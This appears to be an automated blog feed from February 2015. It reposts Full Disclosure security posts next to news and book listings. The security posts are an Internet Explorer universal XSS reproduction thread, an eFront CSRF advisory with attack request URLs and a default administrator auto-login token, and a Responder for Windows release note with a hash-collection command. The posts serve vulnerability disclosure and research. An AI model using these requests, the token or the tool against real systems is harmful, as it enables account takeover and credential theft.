Latest YouTube Video

Saturday, February 7, 2015

Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

Hi David. When I tried to reproduce it using code hosted on one of my domains, I tried three variations of what I assumed at the time the PHP code from the original was: I wasn't able to get it working, so as I said, I used Burp Suite to modify your demo in realtime as it came down to my browser, with the Daily Mail domain being replaced in response headers and bodies with a different target domain, but no other changes made. It worked with another CloudFlare customer's site (tickld.com), but not a non-CloudFlare customer's site (can't share that one without giving away information I'm not supposed to). It seems like that was a coincidence, and that the reason it didn't work on the other site was something other than them not being a CloudFlare customer. Enough other people (in particular, @filedescriptor, who Justin Steven sent a link to (http://ift.tt/1KsbrVG)) have validated the way the exploit works that I agree it appears to be essentially universal. When are you going to give it a cool name and logo to ensure it gets the media coverage it deserves? :) - Ben On 2015-02-04 21:06, David Leo wrote: > "is this entirely an IE flaw" > Yes. > > "is it tied to the use of Cloudflare" > No. > > "I tried to reproduce... was unsuccessful" > Likely, this detail is missing: > > Please tell us whether you reproduce(with the PHP code). > > "am I correct... JavaScript hosted on shared domains" > In the demo, it's first injected into page without any JavaScript. > (robots.txt) > > "I don't have time to to a teardown on CloudFlare.JS" > Honestly we don't even know such file exists :-) > We uploaded and took a screenshot - that's all. > > "it's a very impressive exploit" > Thanks. > > 'make sure the label "universal" is actually justified' > It has also been tested against Yahoo etc. > > "Sorry if this has already been discussed elsewhere" > Many asked - for example: > http://ift.tt/1zv21Xy > > Again, please tell us whether you reproduce with the PHP code. > > Kind Regards, > > On 2015/2/5 3:29, Ben Lincoln (F7EFC8C9 - FD) wrote: >> So here's a possibly stupid question: is this entirely an IE flaw, or >> is it tied to the use of Cloudflare by the targeted site as well as >> the attacking site? >> >> I ask because: >> >> 1 - I tried to reproduce the attack in a number of ways without using >> CloudFlare, and was unsuccessful. >> 2 - Since I don't have access to a CloudFlare account, I used Burp to >> do a find/replace for proxied response headers and bodies on >> "www.dailymail.co.uk" and then "dailymail.co.uk" with a target domain >> which does not use Cloudflare, then accessed the Deusen demo page. >> The injection attempt failed. >> 3 - I then used Burp in the same way, but replaced >> "www.dailymail.co.uk"/"dailymail.co.uk" with a target domain which >> *does* use CloudFlare, and the injection attempt succeeded. >> >> If this is true, am I correct in thinking that while this definitely >> involves a vulnerability in IE, it also depends at least on targeting >> website owners who use JavaScript hosted on shared domains >> (CloudFlare, in this case), which is inherently riskier than hosting >> it all on one's own domain due to the way cross-domain security works >> in modern browsers? >> >> I don't have time to to a teardown on CloudFlare.JS, but does this >> also depend on some sort of code vulnerability in that file? >> >> Even if one or both of those caveats are true, it's a very impressive >> exploit, but I'd like to make sure the label "universal" is actually >> justified. >> >> Sorry if this has already been discussed elsewhere. I couldn't find >> anything when I looked. >> >> - Ben >> >> On 2015-02-02 12:53, Joey Fowler wrote: >>> Hi David, >>> >>> "nice" is an understatement here. >>> >>> I've done some testing with this one and, while there *are* quirks, >>> it most >>> definitely works. It even bypasses standard HTTP-to-HTTPS restrictions. >>> >>> As long as the page(s) being framed don't contain X-Frame-Options >>> headers >>> (with `deny` or `same-origin` values), it executes successfully. >>> Pending >>> the payload being injected, most Content Security Policies are also >>> bypassed (by injecting HTML instead of JavaScript, that is). >>> >>> It looks like, through this method, all viable XSS tactics are open! >>> >>> Nice find! >>> >>> Has this been reported to Microsoft outside (or within) this thread? >>> >>>



Source: Gmail -> IFTTT-> Blogger

Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

> is this entirely an IE flaw, or is it tied to the use of Cloudflare by the targeted site as well as the attacking site? No, this is entirely an IE flaw. I've repro'd on domains that I know don't use cloudflare, from a domain that doesn't use cloudflare. There's a great teardown on this POC by @filedescriptor at http://ift.tt/1KsbrVG



Source: Gmail -> IFTTT-> Blogger

Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

Thanks Zaakiy, I'm able to get the hacked page on IE9 after changing the document mode from Quirks to IE9 Standards. Screenshot attached. I'm sure you could get around having to manually switch the document mode with the appropriate DOCTYPE set in the exploit html page. David, could you share the contents of "1.php"? I'm assuming it is a delayed re-direct to the target's domain? I am unable to reproduce the exploit locally with the same code (assuming my 1.php is correct), though without the cloudflare scripts. Thanks, Peter Peter Barkley | Senior Security Intelligence Analyst | Security Operations Centre | Royal Bank of Canada



Source: Gmail -> IFTTT-> Blogger

[FD] Multiple CSRF vulnerabilities in eFront v. 3.6.15.2 (CE)

Advisory: Multiple CSRF vulnerabilities in eFront v. 3.6.15.2 (CE) Advisory ID: SROEADV-2015-09 Author: Steffen Rösemann Affected Software: eFront v. 3.6.15.2 (CE) (Release-date: 05-Dec-2014, build 18021) Vendor URL: http://ift.tt/XKxSOF Vendor Status: patched CVE-ID: - Tested with/on: -Browser: Firefox 35, Iceweasel 31.3.0 -OS: Mac OS X 10.10 (XAMPP installation), Kali Linux 1.0.9a (Apache2, MySQL) ========================== Vulnerability Description: ========================== The E-learning platform eFront v. 3.6.15.2 (Community Edition, build 18021) suffers from multiple CSRF vulnerabilities. ================== Technical Details: ================== The vulnerabilities can be found in different modules that are all used in the administrator.php file: ctg=modules (delete and deactivate/activate modules): http:// {TARGET}/www/administrator.php?ctg=modules&delete_module={MODULE_NAME}&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=modules&deactivate_module={MODULE_NAME}&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=modules&activate_module={MODULE_NAME}&ajax=ajax ctg=users (delete and deactivate/activate users): http:// {TARGET}/www/administrator.php?ctg=users&activate_user={USER_NAME}&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=users&deactivate_user={USER_NAME}&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=users&delete_user={USER_NAME}&ajax=ajax ctg=themes (activate/deactivate and delete themes): http:// {TARGET}/www/administrator.php?ctg=themes&tab=set_theme&set_theme={THEME_ID}&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=themes&tab=set_theme&delete={THEME_ID}&ajax=ajax ctg=digest (deactivate/activate and delete events, e.g. deactivate user registration, deactivate email for account activation) e.g. EVENT_ID 3 = user email activation e.g. EVENT_ID 4 = user registration http:// {TARGET}/www/administrator.php?ctg=digests&postAjaxRequest=1&deactivate_notification={EVENT_ID}&event=1&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=digests&postAjaxRequest=1&activate_notification={EVENT_ID}&event=1&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=digests&delete_notification={EVENT_ID}&ajax=1&event=1 ctg=languages (deactivate/activate and delete language settings) e.g. LANGUAGE_NAME = german http:// {TARGET}/www/administrator.php?ctg=languages&activate_language={LANGUAGE_NAME}&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=languages&deactivate_language={LANGUAGE_NAME}&ajax=ajax http:// {TARGET}/www/administrator.php?ctg=languages&delete_language={LANGUAGE_NAME}&ajax=ajax Exploit-Example (valid for all above listed vulnerabilities): The following CSRF-vulnerability can be abused to activate/deactivate the auto-login feature of an arbitrary user: http://{TARGET}/www/administrator.php?ctg=maintenance&postAjaxRequest=1&autologin=1&login={USERNAME}&ajax=ajax That makes it possible to login via a URL in an arbitrary user-account like in the following example without providing any login-credentials: http://{TARGET}/www/index.php?autologin={AUTO_LOGIN_TOKEN} eFront creates three standard user-accounts while the installation process. One of it is the administrators account. The components being used for creating the auto-login token are the following informations: - a salt - the accounts creation date - the username The salt isn't generated dynamically during the installation. On a common eFront installation without any changes by the administrator, it has the value cDWQR#$Rcxsc. The admin accounts creation date has the standard value 1365149958. As the standard administrators accountname is "admin", the auto-login token for the administrators account of eFront has always the value eb514ea3c45d74a1218e207fb4b345b1 if the precondition is fulfilled, that none of the above mentioned values were changed after the installation. That makes it possible for an attacker to abuse the CSRF-vulnerability to gain access to the administrators account. ========= Solution: ========= Upgrade to eFront v. 3.6.15.3, build 18022. ==================== Disclosure Timeline: ==================== 14/15-Jan-2015 – found the vulnerability 15-Jan-2015 - informed the developers (see [3]) 15-Jan-2015 – release date of this security advisory [without technical details] 15-Jan-2015 - vendor responded, announces a patch 05-Feb-2015 - vendor released patch (v. 3.6.15.3, build 18022) 05-Feb-2015 - release date of this security advisory 05-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://ift.tt/XKxSOF [2] http://ift.tt/1A3Y90l [3] http://ift.tt/1A3Y6Sj [4] http://ift.tt/1zK4BYE



Source: Gmail -> IFTTT-> Blogger

[FD] Responder Windows Version

Responder for Windows is meant to propagate further compromises from a Windows workstation/server. Features includes: - Be able to propagate (pivoting) compromises across subnets and domains from any compromised Windows machine ranging from Windows 2000 to 8.1, Server 2012R2. - This tool can also be used to compromise a domain from an external penetration test. - This version will disable NetBIOS on all interfaces and the current firewall profile (no reboot needed) on the target host. - Default values will be turned back On when killing Responder (CRTL-C). - LLMNR and Netbios works out of the box on any Windows XP-2003 - Netbios support works on all versions. - Best way to collect hashes with this Windows version: Responder.exe -i IP_Addr -rF Installing: - Binary: Just drop the executable and the configuration file (Responder.conf) inside a directory (eg: c:/temp/responder) and launch it. - From source: Install python on a Windows machine. run "pip install pyinstaller" cd in Responder source directory pyinstaller --onefile -F Responder.py Your binary will be located in the folder dist/ - Executing the source direclty: You can run Responder as usual from the source folder (with python installed): python Responder.py Considerations: - Make sure you have administrative privileges. - Make sure to include a conventional Responder.conf file in Responder running directory. - Any rogue server can be turn off in Responder.conf. - The Wpad proxy server is known to be buggy on some Windows versions. It's not recommended to use it. - For now, SMB rogue authentication server is *not* supported. You can download Responder for Windows (Beta) sources and binaries at the following url: http://ift.tt/1A3Y8JK Follow latest updates on twitter: http://ift.tt/1kMSke2 Cheers,



Source: Gmail -> IFTTT-> Blogger

[FD] LG On Screen Phone authentication bypass (CVE-2014-8757)

LG On Screen Phone authentication bypass vulnerability



Source: Gmail -> IFTTT-> Blogger

Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

'could you share the contents of "1.php"?' Sure: "I'm assuming it is a delayed re-direct to the target's domain?" Exactly. :-) "the cloudflare scripts" It's been tested without them. Kind Regards, On 2015/2/6 2:31, Barkley, Peter wrote: > Thanks Zaakiy, > > I'm able to get the hacked page on IE9 after changing the document mode from Quirks to IE9 Standards. Screenshot attached. I'm sure you could get around having to manually switch the document mode with the appropriate DOCTYPE set in the exploit html page. > > David, could you share the contents of "1.php"? I'm assuming it is a delayed re-direct to the target's domain? I am unable to reproduce the exploit locally with the same code (assuming my 1.php is correct), though without the cloudflare scripts. > > Thanks, > Peter > > > Peter Barkley | Senior Security Intelligence Analyst | Security Operations Centre | Royal Bank of Canada > > > >



Source: Gmail -> IFTTT-> Blogger

[FD] Very Important Info About "Major Internet Explorer Vulnerability - NOT Patched"

1. "Spartan - vulnerable (Windows 10)" http://ift.tt/16y8ky1 Thanks to Zaakiy Siddiqui! 2. Many asked for it. 3. It's Universal XSS, as we tested: Not only dailymail.co.uk - also Yahoo etc Not only injecting content - also getting private info etc. Kind Regards,



Source: Gmail -> IFTTT-> Blogger

Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

"is this entirely an IE flaw" Yes. "is it tied to the use of Cloudflare" No. "I tried to reproduce... was unsuccessful" Likely, this detail is missing: Please tell us whether you reproduce(with the PHP code). "am I correct... JavaScript hosted on shared domains" In the demo, it's first injected into page without any JavaScript. (robots.txt) "I don't have time to to a teardown on CloudFlare.JS" Honestly we don't even know such file exists :-) We uploaded and took a screenshot - that's all. "it's a very impressive exploit" Thanks. 'make sure the label "universal" is actually justified' It has also been tested against Yahoo etc. "Sorry if this has already been discussed elsewhere" Many asked - for example: http://ift.tt/1zv21Xy Again, please tell us whether you reproduce with the PHP code. Kind Regards, On 2015/2/5 3:29, Ben Lincoln (F7EFC8C9 - FD) wrote: > So here's a possibly stupid question: is this entirely an IE flaw, or is it tied to the use of Cloudflare by the targeted site as well as the attacking site? > > I ask because: > > 1 - I tried to reproduce the attack in a number of ways without using CloudFlare, and was unsuccessful. > 2 - Since I don't have access to a CloudFlare account, I used Burp to do a find/replace for proxied response headers and bodies on "www.dailymail.co.uk" and then "dailymail.co.uk" with a target domain which does not use Cloudflare, then accessed the Deusen demo page. The injection attempt failed. > 3 - I then used Burp in the same way, but replaced "www.dailymail.co.uk"/"dailymail.co.uk" with a target domain which *does* use CloudFlare, and the injection attempt succeeded. > > If this is true, am I correct in thinking that while this definitely involves a vulnerability in IE, it also depends at least on targeting website owners who use JavaScript hosted on shared domains (CloudFlare, in this case), which is inherently riskier than hosting it all on one's own domain due to the way cross-domain security works in modern browsers? > > I don't have time to to a teardown on CloudFlare.JS, but does this also depend on some sort of code vulnerability in that file? > > Even if one or both of those caveats are true, it's a very impressive exploit, but I'd like to make sure the label "universal" is actually justified. > > Sorry if this has already been discussed elsewhere. I couldn't find anything when I looked. > > - Ben > > On 2015-02-02 12:53, Joey Fowler wrote: >> Hi David, >> >> "nice" is an understatement here. >> >> I've done some testing with this one and, while there *are* quirks, it most >> definitely works. It even bypasses standard HTTP-to-HTTPS restrictions. >> >> As long as the page(s) being framed don't contain X-Frame-Options headers >> (with `deny` or `same-origin` values), it executes successfully. Pending >> the payload being injected, most Content Security Policies are also >> bypassed (by injecting HTML instead of JavaScript, that is). >> >> It looks like, through this method, all viable XSS tactics are open! >> >> Nice find! >> >> Has this been reported to Microsoft outside (or within) this thread? >> >>



Source: Gmail -> IFTTT-> Blogger

Re: [FD] Major Internet Explorer Vulnerability - NOT Patched

Ben, we have reproduced the vulnerability in many occasion. First of all, at least to steal the session it is no matter if X-Frame-Option is set to deny/same-origin. Secondly, we were able to easily bypass the alert popup. It is not needed if you implement the "waiting" logic with a synchronous AJAX call or a looped wait (there is no sleep is JS). The most important part is that the "1.php" in the original POC, should implement a sleep itself. This seems to do the trick to allow setTimeout to be assigned in the iframe prior to be redirected to the target site. It has nothing to do with Cloudflare. Nevertheless, it is particularly difficult in my opinion to serve one HTML page to target multiple web sites at once in a phising/session-stealing attack. This is because, alert/synchronous AJAX/custom sleep, lock the browser resources so other iframe-based (independent) attacks cannot be executed. Using asynchronous AJAX with onreadystate does not seem to work. But, of course, alert dialog can still be easily bypassed so web users can't do anything to avoid a signle exploitation. Regards, Dimitris Strevinas Chief Security Engineer / Obrela Security Industries



Source: Gmail -> IFTTT-> Blogger

MLS Update February 07, 2015 at 03:34PM

Seattle Sounders midfielder Osvaldo Alonso undergoes successful right groin surgery, will begin rehab immediately


The Seattle Sounders announced Saturday that midfielder Osvaldo Alonso has undergone successful right groin surgery. The procedure was preformed by Dr. William Hutchinson Jr. on Friday, February 6 in Santa Monica, California. Alonso is set to begin rehabilitation immediately following the procedure.



Read More



from MLSsoccer.com News http://ift.tt/16EZX4a

via IFTTT


MLS Update February 07, 2015 at 02:01PM

USMNT has "a lot of respect" for Panama side on the rise, expect "tough" game at StubHub Center


CARSON, Calif. – Panama's rise among CONCACAF's elite nations, which nearly climaxed with a berth in last year's World Cup, hasn't gone unnoticed, certainly not by the US men's national team.


Read More



from MLSsoccer.com News http://ift.tt/1IrbVQb

via IFTTT

United States defender Steve Birnbaum (knee) won't play against Panama on Sunday after starting last week against Chile (ESPN)

from ESPN http://m.espn.go.com/

via IFTTT

NBC's bid for the truth led by veteran 'digger'

NBC's investigation into Brian Williams is headed by Richard Esposito, a senior executive producer.



from Business and financial news - CNNMoney.com http://ift.tt/1D8FDV9

via IFTTT

Book Release: Animals in Translation Using the Mysteries of Autism to Decode Animal Behavior by Grandin, Temple; Johnson, Catherine.

Temple Grandin's -- Animals in Translation Among its provocative ideas, the book: argues that language is not a requirement for consciousness -- and that animals do have consciousness applies the autism theory of "hyper-specificity" to animals, showing that animals and autistic people are so sensitive to detail that they "can't see the forest for the trees" -- a talent as well as a "deficit" explores the "interpreter" in the normal human brain that filters out detail, leaving people bli



Source: Baltimore County Public Library - New Books

via IFTTT

Brian Williams stepping aside for 'several days'

Read full story for latest details.



from Business and financial news - CNNMoney.com http://ift.tt/1AGLh1t

via IFTTT

MLS Update February 07, 2015 at 11:00AM

Joey Saputo and the Montreal Impact are unmoved by big spending of rival Toronto FC: "We have a plan"


MONTREAL – For a second straight winter, Toronto FC made the biggest splash – expansion teams aside – in this year's MLS transfer market.


So when Impact owner Joey Saputo was asked for his general thoughts on the offseason at a roundtable discussion this Wednesday, he couldn’t escape the state of affairs at Montreal’s historical rival.


Read More



from MLSsoccer.com News http://ift.tt/1KBh7fS

via IFTTT

MLS Update February 07, 2015 at 11:43AM

Jurgen Klinsmann still favors Michael Bradley in advanced position for USMNT despite holding role vs. Chile


CARSON, Calif. – Michael Bradley was back in his familiar holding-midfield role for the US men's national team's friendly last week in Chile. Did it signal that Jurgen Klinsmann has changed his mind on how best to employ the Toronto FC star?


Uh, no.


Klinsmann played Bradley as an attacking midfielder last year, including all four World Cup games in Brazil, but he positioned the 27-year-old veteran deeper against Chile, he said, based on the makeup of his roster.


Read More



from MLSsoccer.com News http://ift.tt/1yUvp5Q

via IFTTT

US defender Birnbaum injured, will skip Panama friendly

CARSON, Calif. (AP) United States defender Steve Birnbaum has a minor knee injury that will keep him out of Sunday's game against Panama.



from FOX Sports Digital http://ift.tt/1LZMZ1k

via IFTTT

MLS Update February 07, 2015 at 10:52AM

DC United defender Steve Birnbaum out of USMNT friendly vs. Panama with minor knee injury


CARSON, Calif. – D.C. United center back Steve Birnbaum has been “dealing with a minor knee injury for the past couple of days” and won't be available for Sunday's US men's national team friendly against Panama, US Soccer revealed on the eve of the match.


Birnbaum, an MLS Rookie of the Year finalist who made his international debut in last week's loss in Chile, was expected to play a major role on the US backline.


Read More



from MLSsoccer.com News http://ift.tt/1zj940O

via IFTTT

People hate the new Keurig ... and its stock

Read full story for latest details.



from Business and financial news - CNNMoney.com http://ift.tt/1Cy4HpT

via IFTTT

Brian Williams' reporting on Katrina: What we know

It didn't take long for the scandal enveloping Brian Williams to prompt fresh scrutiny of one of the most formative reporting assignments of his career: His time in New Orleans after Hurricane Katrina.



from Business and financial news - CNNMoney.com http://ift.tt/16TJKsq

via IFTTT

Sydney FC beats Perth 3-1 in A-League

SYDNEY (AP) Perth's lead in the A-League was cut to one point after its 10-man side lost to nine-man Sydney FC 3-1, while second-place Melbourne Victory beat Melbourne City 3-0.



from FOX Sports Digital http://ift.tt/1DqInhe

via IFTTT

Torino wins 3-1 at Verona in Serie A

MILAN (AP) Torino beat Hellas Verona 3-1 Saturday for its fourth successive victory in Serie A.



from FOX Sports Digital http://ift.tt/1AGgxhd

via IFTTT

Congo beats Eq. Guinea on penalties in 3rd place game

MALABO, Equatorial Guinea (AP) Congo beat host Equatorial Guinea 4-2 in a penalty shootout on Saturday after the third place game at the African Cup of Nations ended 0-0 after 90 minutes.



from FOX Sports Digital http://ift.tt/1C6UwWu

via IFTTT

MLS Update February 07, 2015 at 08:19AM

American Exports: John Brooks plays critical role in return to the lineup as Hertha Berlin grab needed win


AMSTERDAM – Hertha Berlin defender John Anthony Brooks returned to the lineup with a vengeance to help the visitors vault out of the Bundesliga danger zone with a 2-0 victory at Mainz 05.


Read More



from MLSsoccer.com News http://ift.tt/1A1Runm

via IFTTT

Book Release: The Short Stories of Ernest Hemingway by Hemingway, Ernest.

Before he gained wide fame as a novelist, Ernest Hemingway established his literary reputation with his short stories. This collection, The Short Stories, originally published in 1938, is definitive. Among these forty-nine short stories are Hemingway's earliest efforts, written when he was a young foreign correspondent in Paris, and such masterpieces as "Hills Like White Elephants," "The Killers," "The Short, Happy Life of Francis Macomber," and "The Snows of Kilimanjaro." Set in the varied land



Source: Baltimore County Public Library - New Books

via IFTTT

MLS Update February 07, 2015 at 07:43AM

MLS Preseason Tracker: Matches, highlights, scores & news updates as they happen (February 7)


Preseason is officially underway, and we've got five games on the schedule today.


Read More



from MLSsoccer.com News http://ift.tt/1DqkZAm

via IFTTT

Crystal Palace beats Leicester 1-0 in Premier League

LEICESTER, England (AP) Joseph Ledley's second-half goal was enough to give Crystal Palace a 1-0 win over last-place Leicester in the Premier League on Saturday.



from FOX Sports Digital http://ift.tt/1uobFep

via IFTTT

Chelsea extends lead atop Premier League to 7 points

LONDON (AP) Chelsea extended its Premier Leauge lead to seven points by beating Aston Villa 2-1 on Saturday while Manchester City was held to a 1-1 draw by Hull.



from FOX Sports Digital http://ift.tt/1uobEXT

via IFTTT

Southampton beats QPR 1-0 in Premier League

LONDON (AP) Sadio Mane scored in injury time to give Southampton a 1-0 win over struggling Queens Park Rangers and keep the club in the top four of the Premier League.



from FOX Sports Digital http://ift.tt/1uobC2a

via IFTTT

La Liga: Atletico Madrid hammer Real Madrid 4-0 to cut Real's lead atop the table to four points (ESPN)

from ESPN http://m.espn.go.com/

via IFTTT

Prem: Chelsea open seven-point lead on Manchester City after winning at Aston Villa 2-1, while City draw 1-1 with Hull (ESPN)

from ESPN http://m.espn.go.com/

via IFTTT

Anthem Data Breach — 6 Things You Need To Know

The Nation’s second largest Health insurer company, Anthem, alerted its customers on Wednesday that hackers had stolen the personal information of over 80 Millions of its customers, making it the largest data breach and double the number of payment cards affected by Target data breach occurred in 2013. The stolen personal information includes residential addresses, birthdays, medical





from The Hacker News http://ift.tt/1IpcHNn

via IFTTT

MLS Update February 07, 2015 at 06:43AM

American Exports: Ventura Alvarado keeps his place for Club America as he starts in draw at Morelia


GUADALAJARA, Mexico – Only time will tell, but Friday could’ve been a turning point in the career of Ventura Alvarado, who started ahead of Paraguay international Pablo Aguilar at center back for Club America in their 2-2 draw on the road to Morelia on Friday night.



The 22-year-old Phoenix, Ariz. native had replaced the suspended Aguilar last Saturday in Las Aguilas’ 1-0 win over Tigres and retained his place this weekend.



Read More



from MLSsoccer.com News http://ift.tt/16vhETa

via IFTTT


Argentina has a new star with a familiar name: Simeone

MONTEVIDEO, Uruguay (AP) Argentina has a new star in the making, and the name will be familiar to many.



from FOX Sports Digital http://ift.tt/1Dq9dGe

via IFTTT

Friday, February 6, 2015

Book Release: Beautiful redemption by McGuire, Jamie, author.

FBI Special Agent in Charge Thomas Maddox and FBI agent Liis Lindy go undercover to spare Thomas' brother Travis Maddox from a prison term by recruiting him into the FBI, but Liis wonders if her feelings for Thomas are more than just a cover story.



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Unstoppable love by Sterling, Porscha

Book Release: We belong together 2 by Moore, Michel'le

Book Release: We belong together by Moore, Michel'le

15 Questions with ... Saadia Muzaffar

Saadia Muzaffar is a leading force in Canada's tech scene and the first in CNNMoney's new series. She founded Tech Girls Canada and is passionate about increasing the ratio of women in tech.



from Business and financial news - CNNMoney.com http://ift.tt/1I9dyBJ

via IFTTT

Staples and RadioShack deliver big blow to jobs

Staples' proposal to buy Office Depot will probably mean even more job losses that RadioShack's bankruptcy and store closing announcement.



from Business and financial news - CNNMoney.com http://ift.tt/1FfmgJx

via IFTTT

Brokaw: I have not demanded Brian Williams be fired

Tom Brokaw refutes reports that he wants Brian Williams fired.



from Business and financial news - CNNMoney.com http://ift.tt/1Ffmgtb

via IFTTT

'Better Call Saul' better be a hit for AMC

Shares of AMC Networks have done little since the tale of Walter White ended. That's why expectations are high for "Breaking Bad" spin-off "Better Call Saul."



from Business and financial news - CNNMoney.com http://ift.tt/1LVtEhQ

via IFTTT

Book Release: Love hotel by Unrue, Jane.

Book Release: Toxic by Van Dyken, Rachel, author.

Gabe Hyde is on borrowed time. Keeping his identity a secret isn't all it's cracked up to be, especially when he meets Saylor. A girl who reminds him of one he used to love--a girl who has the power to break down every wall he's ever built.



Source: Baltimore County Public Library - New Books

via IFTTT

Gravity wins: GoPro stock plummets 10%

GoPro was an IPO stud last year and its Hero cameras are still selling like hotcakes, but investors are losing interest.



from Business and financial news - CNNMoney.com http://ift.tt/1D5XsEm

via IFTTT

Where zombie foreclosures are making a comeback

While the number of zombie foreclosures has fallen from last year, 19 states have seen a resurgence, a recent RealtyTrac report found.



from Business and financial news - CNNMoney.com http://ift.tt/1DIqdVE

via IFTTT

Book Release: All the wrong places : a life lost and found by Connors, Phillip.

Connors, who recalled his stints as a fire lookout in "Fire Season" here revisits the period before he entered the wilderness during a time of searching (mostly in vain) for answers to the riddle of his brother's suicide at the age of 22. His path takes him to New York, where he is a fish out of water, working at the "Wall Street Journal" despite his socialist leanings and living in the Bedford-Stuyvesant section of Brooklyn, where his white skin makes him an object of baffled wonder in an all-b



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Bold : how to go big, achieve success, and impact the world by Diamandis, Peter H. author.

"Bold is a radical, how-to guide for using exponential technologies, moonshot thinking, and crowd-powered tools to create extraordinary wealth while also positively impacting the lives of billions."--Jacket flap.



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: Storm of dogs by Hunter, Erin.

"Lucky and the dogs of the Wild Pack must fight tooth and claw to survive the storm of dogs--the terrifying battle that has been haunting Lucky's dreams"--



Source: Baltimore County Public Library - New Books

via IFTTT

MLS Update February 06, 2015 at 07:50AM

Philadelphia Union academy kids invited to Florida preseason, could become next Homegrown signings



For the first time in franchise history, the Philadelphia Union have elected to bring members of their youth academy to Florida for preseason training – with the primary goal to show the youngsters what it’s like to be a professional for a few weeks.


But that’s not the only goal.


Read More



from MLSsoccer.com News http://ift.tt/1KoniWE

via IFTTT

Next season's Serie A leaves time for Euro 2016 preparation

MILAN (AP) Next season's Serie A will begin Aug. 23 and end on May 15, 2016, meeting a request from Italy coach Antonio Conte to leave enough time to prepare for the European Championship.



from FOX Sports Digital http://ift.tt/1C1nKnp

via IFTTT

In photos: Subaru WRX sibling rivalry

The WRX STI has always been on top of Subaru's pedestal, but its cheaper sibling is aiming to knock it off.



from Business and financial news - CNNMoney.com http://ift.tt/1v5pKrX

via IFTTT

Apple CEO who fired Jobs: 'I wish I had hired him back'

John Sculley, Apple's former CEO who ousted Steve Jobs, said he wished he could have hired him back.



from Business and financial news - CNNMoney.com http://ift.tt/16Nw0j2

via IFTTT

Morocco fined $1M for failing to host African Cup

BATA, Equatorial Guinea (AP) The Confederation of African Football has fined Morocco $1 million for failing to host the 2015 African Cup of Nations and banned the country from participating in the next two tournaments in 2017 and 2019.



from FOX Sports Digital http://ift.tt/1DIdJ0v

via IFTTT

DonorsChoose Anonymous

... trading to help our students of today become the future of our tomorrow. $ Help a classroom in support of DonorsChoose Anonymous. other amount.



from Google Alert - anonymous http://ift.tt/16zHcyM

via IFTTT

Book Release: We should all be feminists by Adichie, Chimamanda Ngozi, 1977- author.

Book Release: Red notice : a true story of high finance, murder, and one man's fight for justice by Browder, Bill, 1964- author.

"A real-life political thriller about an American financier in the Wild East of Russia, the murder of his principled young tax attorney, and his dangerous mission to expose the Kremlin's corruption"--Amazon.com.



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: City beasts : fourteen stories of uninvited wildlife by Kurlansky, Mark, author.

In these stories, Mark Kurlansky journeys to his familiar haunts like New York's Central Park or Miami's Little Havana but with an original, earthy, and adventurous perspective. From baseball players in the Dominican Republic to Basque separatists in Spain to a restaurant owner in Cuba, from urban coyotes to a murder of crows, Kurlansky travels the worlds of animals and their human counterparts, revealing moving and hilarious truths about our connected existence. In the end, he illuminates how c



Source: Baltimore County Public Library - New Books

via IFTTT

Book Release: The Secret Rooms A True Story of a Haunted Castle, a Plotting Duchess, and aFamily Secret by Bailey, Catherine.

For fans of Downton Abbey After the Ninth Duke of Rutland, one of the wealthiest men in Britain, died alone in a cramped room in the servants’ quarters of Belvoir Castle on April 21, 1940, his son and heir ordered the room, which contained the Rutland family archives, sealed. Sixty years later, Catherine Bailey became the first historian given access. What she discovered was a mystery: The Duke had painstakingly erased three periods of his life from all family records—but why? As Bailey uncove



Source: Baltimore County Public Library - New Books

via IFTTT

Comcast calls customer 'Super B----' on bill

For the second time in less than a month, Comcast sends a customer a bill with an insult printed on it.



from Business and financial news - CNNMoney.com http://ift.tt/1zWEfpw

via IFTTT

Minnesota to stop accepting TurboTax filings due to fraud

Read full story for latest details.



from Business and financial news - CNNMoney.com http://ift.tt/1zWEfps

via IFTTT

Filing a false tax return comes with big penalties

Allow a tax preparer to understate your income on a 1099 or W-2 to lower your tax bill or get you a bigger refund, and you could be in big trouble if the IRS finds out.



from Business and financial news - CNNMoney.com http://ift.tt/1DI17Gv

via IFTTT

Nice try: Goldman Sachs CEO Twitter account is a fake

Goldman Sachs said a Twitter account claiming to be owned by the most powerful man on Wall Street is a hoax.



from Business and financial news - CNNMoney.com http://ift.tt/1DI16lU

via IFTTT

MLS Update February 06, 2015 at 06:42AM

New York City FC sign Colombian midfielder Javier Calle on loan from Independiente Medellin


New York City FC announced the signing of Colombian midfielder Javier Calle on Friday, providing coach Jason Kreis with another useful weapon as he prepares his squad for their inaugural MLS season.


Read More



from MLSsoccer.com News http://ift.tt/1EM3hsz

via IFTTT

Player for 2nd-tier Leeds found not guilty of racism

LONDON (AP) The English Football Association has found an Italian defender for second-tier English club Leeds not guilty of a charge of racially abusing an opponent during a game.



from FOX Sports Digital http://ift.tt/18UyexG

via IFTTT

Russia says it has finally paid national coach Capello

MOSCOW (AP) The Russian Football Union says it has cleared its debt to national coach Fabio Capello, who had been unpaid since June.



from FOX Sports Digital http://ift.tt/1xAjVmo

via IFTTT

MLS Update February 06, 2015 at 06:00AM

Kick Off: Toronto fans welcome Sebastian Giovinco; Sacha Kljestan opens New York Red Bulls account


Here are the top 15 stories everyone's talking about this morning:


1. PRESEASON PREPARATIONS


Read More



from MLSsoccer.com News http://ift.tt/1zFTjVk

via IFTTT

Pilot in Williams scandal: 'I am questioning my memories'

CNN on Thursday reported the story of a pilot who said he was flying the helicopter with Brian Williams on it. That pilot no longer stands by his story.



from Business and financial news - CNNMoney.com http://ift.tt/1zWxTGA

via IFTTT

Book Release: Octonauts and the Adélie penguins.

